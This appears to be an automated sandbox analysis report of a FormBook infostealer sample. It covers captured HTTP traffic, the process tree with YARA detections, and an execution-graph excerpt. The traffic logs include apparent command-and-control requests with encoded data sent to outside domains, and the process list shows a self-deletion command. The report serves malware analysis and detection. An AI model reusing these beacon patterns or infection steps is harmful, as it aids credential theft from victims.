                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.428450108 CEST962INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:03:32 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Expires: Tue, 08 Oct 2024 15:03:32 GMT
                                                                                                                                                                                                                                                                                Location: https://www.tigajco69.fun/md02/?all=PZp0UtAd/MX+bbfmlI0lLX5uB5dB2ubu0xorlIAgjhA6JQ6omJZi4VnySSsC/hEyaNVU&P6=6lUxOJCX68zXY
                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgK9xD7AsErj9CAXTR3WJ1h6FojjVLmMZ38kO1Tcy0kXyyMv9oYg%2Fege4gX4a4b1Nsd%2BXbSd%2BoikdN9Mba5zdf3NXgvAZ4o3zOQr8dcZJYF8vN348AxetIiFLmV4Z0LJR57zcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8cf6acc74db080d9-EWR
                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                5192.168.11.2049745198.185.159.14480
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745574951 CEST168OUTGET /md02/?all=Huvb14uAl+TqSP+sM2oBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyA8WIhVJbwk&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.upcyclecharms.com
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847243071 CEST1276INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                Content-Length: 2061
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:05:35 UTC
                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Server: Squarespace
                                                                                                                                                                                                                                                                                X-Contextid: SXdSXF3L/N18FwJo2
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px;
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847323895 CEST1084INData Raw: 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72
                                                                                                                                                                                                                                                                                Data Ascii: font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "Helvetica Neue", Helv


                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                Start time:10:01:30
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\kHslwiV2w6.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\kHslwiV2w6.exe"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff72f5a0000
                                                                                                                                                                                                                                                                                File size:1'627'744 bytes
                                                                                                                                                                                                                                                                                MD5 hash:3364DC2488F8444000A9DA4C6D999FC4
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                                Start time:10:01:30
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                Imagebase:0x7ff7b2f40000
                                                                                                                                                                                                                                                                                File size:875'008 bytes
                                                                                                                                                                                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                Start time:10:01:30
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                                                                                                                                Imagebase:
                                                                                                                                                                                                                                                                                File size:839'632 bytes
                                                                                                                                                                                                                                                                                MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                Start time:10:01:31
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                                                                                                                                                File size:2'141'552 bytes
                                                                                                                                                                                                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                Start time:10:01:31
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                Imagebase:0x7ff763ff0000
                                                                                                                                                                                                                                                                                File size:4'849'904 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                Start time:10:01:35
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\raserver.exe"
                                                                                                                                                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                                                                                                                                                File size:107'520 bytes
                                                                                                                                                                                                                                                                                MD5 hash:D1053D114847677185F248FF98C3F255
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                Start time:10:01:38
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                                                                                                                                Imagebase:0x6a0000
                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                Start time:10:01:38
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                Imagebase:0x7ff7b2f40000
                                                                                                                                                                                                                                                                                File size:875'008 bytes
                                                                                                                                                                                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                  Execution Coverage:5.2%
                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                  Signature Coverage:25.2%
                                                                                                                                                                                                                                                                                  Total number of Nodes:944
                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:46
                                                                                                                                                                                                                                                                                  execution_graph 30344 7ff72f5ba280 ResetEvent 30385 7ff72f5b3580 24 API calls 30308 7ff72f637f90 13 API calls 30309 7ff72f665390 71 API calls 30311 7ff72f5abb90 14 API calls 30313 7ff72f5d4390 13 API calls 30347 7ff72f65aa80 86 API calls 30389 7ff72f5c498e 10 API calls 30390 7ff72f5b9d60 34 API calls 30349 7ff72f5ab260 malloc RtlPcToFileHeader RaiseException 29958 7ff72f5a1758 85 API calls 30314 7ff72f661b70 88 API calls 30315 7ff72f5c2770 25 API calls 30250 7ff72f65a660 30251 7ff72f65a66d 30250->30251 30258 7ff72f65a67b 30251->30258 30259 7ff72f62fe10 85 API calls 30251->30259 30316 7ff72f65ab60 87 API calls 30278 7ff72f5cd16a 119 API calls 29157 7ff72f5a4740 29187 7ff72f5ab820 FlsAlloc 29157->29187 29159 7ff72f5a48e4 29160 7ff72f5a474f 29160->29159 29200 7ff72f5ab6c0 GetModuleHandleExW 29160->29200 29162 7ff72f5a4778 29201 7ff72f5a5ad0 29162->29201 29164 7ff72f5a4780 29164->29159 29209 7ff72f5acb30 29164->29209 29168 7ff72f5a47e7 29171 7ff72f5a4822 29168->29171 29172 7ff72f5aced0 8 API calls 29168->29172 29169 7ff72f5a47b1 29169->29159 29169->29168 29239 7ff72f5aced0 29169->29239 29173 7ff72f5a4879 29171->29173 29218 7ff72f5b0030 29171->29218 29172->29171 29226 7ff72f5ac3c0 29173->29226 29176 7ff72f5a487e 29176->29159 29242 7ff72f5b0470 GetEnabledXStateFeatures GetEnabledXStateFeatures 29176->29242 29178 7ff72f5a4896 29179 7ff72f5a48c3 29178->29179 29180 7ff72f5a48aa 29178->29180 29244 7ff72f5ac8a0 29179->29244 29243 7ff72f5ab980 GetStdHandle WriteFile 29180->29243 29184 7ff72f5a48b6 RaiseFailFastException 29184->29179 29188 7ff72f5ab840 29187->29188 29189 7ff72f5ab96e 29187->29189 29246 7ff72f5b2750 29188->29246 29189->29160 29194 7ff72f5aced0 8 API calls 29195 7ff72f5ab872 29194->29195 29196 7ff72f5ab89d GetCurrentProcess GetProcessAffinityMask 29195->29196 29198 7ff72f5ab894 29195->29198 29199 7ff72f5ab908 29195->29199 29196->29198 29197 7ff72f5ab8e4 QueryInformationJobObject 29197->29199 29198->29197 29199->29160 29200->29162 29421 7ff72f60ac48 29201->29421 29204 7ff72f5a5b24 29204->29164 29206 7ff72f5a5af2 29206->29204 29207 7ff72f5ac8a0 InitializeCriticalSectionEx 29206->29207 29208 7ff72f5a5b1d 29207->29208 29208->29164 29210 7ff72f5ac8a0 InitializeCriticalSectionEx 29209->29210 29211 7ff72f5a47a1 29210->29211 29211->29159 29212 7ff72f5a40a0 29211->29212 29213 7ff72f60ac48 3 API calls 29212->29213 29214 7ff72f5a40be 29213->29214 29215 7ff72f5a415a 29214->29215 29436 7ff72f5a2e10 InitializeCriticalSectionEx malloc RtlPcToFileHeader RaiseException 29214->29436 29215->29169 29217 7ff72f5a40f0 29217->29169 29219 7ff72f5b005b 29218->29219 29225 7ff72f5b0106 29218->29225 29220 7ff72f60ac48 3 API calls 29219->29220 29221 7ff72f5b007a 29220->29221 29222 7ff72f5ac8a0 InitializeCriticalSectionEx 29221->29222 29223 7ff72f5b00a5 29222->29223 29224 7ff72f5b00ee GetSystemTimeAsFileTime 29223->29224 29224->29225 29225->29173 29227 7ff72f5ac40c 29226->29227 29229 7ff72f5ac406 29226->29229 29228 7ff72f5aced0 8 API calls 29227->29228 29228->29229 29437 7ff72f5ac830 29229->29437 29232 7ff72f5ac483 29232->29176 29233 7ff72f5ac45f 29233->29232 29460 7ff72f5a5720 29233->29460 29235 7ff72f5ac468 29235->29232 29467 7ff72f5adaf0 29235->29467 29236 7ff72f5ac478 29236->29176 29666 7ff72f5ad0e0 8 API calls 29239->29666 29241 7ff72f5acef8 29241->29168 29242->29178 29243->29184 29245 7ff72f60a952 InitializeCriticalSectionEx 29244->29245 29392 7ff72f5ac0d0 29246->29392 29248 7ff72f5b276e 29249 7ff72f5ac0d0 8 API calls 29248->29249 29250 7ff72f5b279b 29249->29250 29251 7ff72f5ac0d0 8 API calls 29250->29251 29252 7ff72f5b27c3 29251->29252 29253 7ff72f5ac0d0 8 API calls 29252->29253 29254 7ff72f5b27eb 29253->29254 29255 7ff72f5ac0d0 8 API calls 29254->29255 29256 7ff72f5b2818 29255->29256 29257 7ff72f5ac0d0 8 API calls 29256->29257 29258 7ff72f5b2840 29257->29258 29259 7ff72f5ac0d0 8 API calls 29258->29259 29260 7ff72f5b286d 29259->29260 29261 7ff72f5ac0d0 8 API calls 29260->29261 29262 7ff72f5b2895 29261->29262 29263 7ff72f5ac0d0 8 API calls 29262->29263 29264 7ff72f5b28bd 29263->29264 29265 7ff72f5ac0d0 8 API calls 29264->29265 29266 7ff72f5b28e5 29265->29266 29267 7ff72f5ac0d0 8 API calls 29266->29267 29268 7ff72f5b2912 29267->29268 29269 7ff72f5ac0d0 8 API calls 29268->29269 29270 7ff72f5b293f 29269->29270 29397 7ff72f5ac1a0 29270->29397 29273 7ff72f5ac1a0 18 API calls 29274 7ff72f5b2990 29273->29274 29275 7ff72f5ac1a0 18 API calls 29274->29275 29276 7ff72f5b29b9 29275->29276 29277 7ff72f5ac1a0 18 API calls 29276->29277 29278 7ff72f5b29e2 29277->29278 29279 7ff72f5ac1a0 18 API calls 29278->29279 29280 7ff72f5b2a0b 29279->29280 29281 7ff72f5ac1a0 18 API calls 29280->29281 29282 7ff72f5b2a39 29281->29282 29283 7ff72f5ac1a0 18 API calls 29282->29283 29284 7ff72f5b2a67 29283->29284 29285 7ff72f5ac1a0 18 API calls 29284->29285 29286 7ff72f5b2a90 29285->29286 29287 7ff72f5ac1a0 18 API calls 29286->29287 29288 7ff72f5b2ab9 29287->29288 29289 7ff72f5ac1a0 18 API calls 29288->29289 29290 7ff72f5b2ae2 29289->29290 29291 7ff72f5ac1a0 18 API calls 29290->29291 29292 7ff72f5b2b0b 29291->29292 29293 7ff72f5ac1a0 18 API calls 29292->29293 29294 7ff72f5b2b34 29293->29294 29295 7ff72f5ac1a0 18 API calls 29294->29295 29296 7ff72f5b2b5d 29295->29296 29297 7ff72f5ac1a0 18 API calls 29296->29297 29298 7ff72f5b2b8b 29297->29298 29299 7ff72f5ac1a0 18 API calls 29298->29299 29300 7ff72f5b2bb9 29299->29300 29301 7ff72f5ac1a0 18 API calls 29300->29301 29302 7ff72f5b2be2 29301->29302 29303 7ff72f5ac1a0 18 API calls 